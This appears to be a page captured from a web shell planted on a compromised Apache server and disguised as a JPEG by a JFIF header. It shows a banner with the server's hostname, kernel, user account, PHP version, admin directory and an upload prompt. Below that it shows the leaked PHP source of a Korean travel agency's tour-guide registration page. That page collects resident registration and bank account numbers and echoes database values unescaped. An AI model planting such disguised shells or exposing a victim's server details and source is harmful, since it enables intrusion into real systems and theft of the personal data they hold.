ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/admin/erp/ |
Upload File : |
<? if($_GET['tpl'] == 'pop'){ include "../include/top_iframe.html"; } else { include "../include/top.html"; } include "_common.php"; $name=$_POST['name']; ?> <div class="contents_wrap"> <div class="contents_wrap_in"> <div class="title" style="margin-bottom:7px;margin-top:20px;font-size:16px;font-weight:600"><i class="xi-user-plus" style="font-size:20px; vertical-align:middle;"></i> 가이드관리<span class="arrow">></span><strong>가이드등록</strong></div> <div class="contents_detail"> <div id="Content_box" > <!-- 폼 --> <form name="frm_mb_edit" id="frm_mb_edit" method="post"> <input type="hidden" name="SqlType" value="mb_edit"> <input type="hidden" name="seq" value="<?=$row['seq']?>"> <input type="hidden" name="mb_sns_id" value="<?=$row['mb_sns_id']?>"> <input type="hidden" name="param" id="param" value="<?=$param?>" /> <div class="member_wrap"> <? include "person_tab.html"; ?> <div class="person_box"> <div class="person_img"> <? if($row['mb_gend']=="M") { ?> <img src="../image/admin/gender_man.png"> <? } else { ?> <img src="../image/admin/gender_woman.png"> <? } ?> </div> <button type="button" class="img_btn"><span>사진첨부</span></button> </div> <table width="30%" border="0" cellspacing="0" cellpadding="0" class="t_register" summary="개인회원 정보를 수정하실 수 있습니다." style="float:left"> <caption>개인회원 정보수정</caption> <tbody> <tr style="border-top:2px solid #777"> <th width="25%"; style="height:41.5px;" scope="row"><label for="name">가이드명</label></th> <td width="75%"><input name="mb_nm" id="mb_nm" type="text" value="<?=$row['mb_nm']?>" size="30" class="input_text" name="name" required /> <input type="radio" name="chk_info" value="HTML"> 남자 <input type="radio" name="chk_info" value="CSS"> 여자 </td> </tr> <tr> <th width="25%"; style="height:38.5px;"scope="row"><label for="mb_enm1">연락처</label></th> <td> <input name="mb_enm2" id="mb_enm2" type="text" value="<?=$row['mb_enm2']?>" size="30" class="input_text"/> </td> </tr> <tr> <th width="25%"; style="height:38.5px;"scope="row"><label for="mb_phone">사용언어</label></th> <td> <input name="mb_phone" id="mb_phone" type="text" value="<?=$row['mb_phone']?>" size="30" class="input_text" style="width:192px"/> </tr> <tr> <th width="25%"; style="height:38.5px;"scope="row"><label for="password">주민등록번호</label></th> <td><input name="mb_pwd" id="mb_pwd" type="text" value="" size="30" maxlength="20" class="input_text" style="width:192px" /> <span class="input_lo"><label for="mb_pwd_change"></label></span></td> </tr> <tr> <th width="25%"; style="height:38px;"rowspan="2" scope="row"><label for="mb_zipno">계좌번호</label></th> <td rowspan="2"> <input name="mb_address1" id="mb_address1" type="text" value="<?=$row['mb_address1']?>" size="13" class="input_text mt5" placeholder="::은행명"/> <input name="mb_address1" id="mb_address1" type="text" value="<?=$row['mb_address1']?>" size="30" class="input_text mt5" placeholder="::계좌번호"/> </td> </tr> <tr> </tr> </tbody> </table> <table width="30%" border="0" cellspacing="0" cellpadding="0" class="t_register" summary="개인회원 정보를 수정하실 수 있습니다." > <tr style="border-top:2px solid #777"> <th style="height:248px; width:101px; ">자격증<br/> <form enctype='multipart/form-data' action='upload_ok.php' method='post'> <input type='file' name='myfile' style="width:67px;"> </form> <td></td> </tr> </table> </form> <ul class="mr_ul"> <li class="mr5 inblock"><a href="javascript:;" onClick="check_mb_frm();" class="Bbtn red">등록하기</a></li> </ul> </div> <!--2022-01-04 장진혁--> <form name="frm_mb_consult" id="frm_mb_consult" action="member_proc.php" method="post"> <input type="hidden" name="SqlType" value="mb_consult_write"> <input type="hidden" name="mb_seq" value="<?=$row['seq']?>"> <input type="hidden" name="mb_id" value="<?=$row['mb_id']?>"> <table width="91%" border="0" cellspacing="0" cellpadding="0" class="t_register"> <tbody> <tr> </tr> </tbody> </table> <h2 class="mt30 mb20"><span class="lo_left"><i class="xi-comment-o" style="font-size:20px; vertical-align:middle;"></i> 행사진행내역</span></h2> <table border="0" cellspacing="0" cellpadding="0" width="71%" class="t_list pop113"> <colgroup> <col width="40px" /> <col width="150px" /> <col width="150px" /> <col width="" /> <col width="150px" /> <col width="100px" /> </colgroup> <thead> <tr style="border-top:1px solid #777"> <th>No.</th> <th>행사일자</th> <th>행사구분</th> <th>행사내용</th> <th>담당자</th> <th>-</th> </tr> </thead> <tbody> <? if(count($data_consult)){ for($i=0 ; $i < count($data_consult) ; $i++){ $row_con = $data_consult[$i]; $num = $total - $i; // 상담 구분 switch($row_con['gubun']){ case 'TEL' : $gubun = "전화문의"; break; case 'SNS' : $gubun = "SNS문의"; break; case 'EMAIL' : $gubun = "이메일문의"; break; default : $gubun = ""; break; } // 담당자 $arr = get_member($row_con['ins_id']); $admin_nm = $arr['mb_nm']; // 상담 내용 $con_content = nl2br($row_con['con_content']); ?> <tr> <td><?=$num?></td> <td><?=$row_con['ins_dt']?></td> <td class="tlc"><?=$gubun?></td> <td class="tll pl15"><?=$con_content?></td> <td class="tlc"><?=$admin_nm?></td> <td> <? if($TK_MEMBER['mb_id'] == $row_con['ins_id']){ ?> <input class="Table_btn" onclick="to_dialog.iframe('person_consult_modify.html?con_seq=<?=$row_con['con_seq']?>','상담 수정','1000','300',true,true,'yes');" type="button" value="수정"> <input class="Table_btn" onclick="consult_delete('<?=$row_con['con_seq']?>');" type="button" value="삭제"> <? } else { ?> - <? } ?> </td> </tr> <?} ?> <?} else {?> <tr><td colspan="6">등록된 상담내역이 없습니다.</td></tr> <?} ?> </tbody> </table> </form> </div> </div> </div> </div> <? include "../include/footer.html" ?>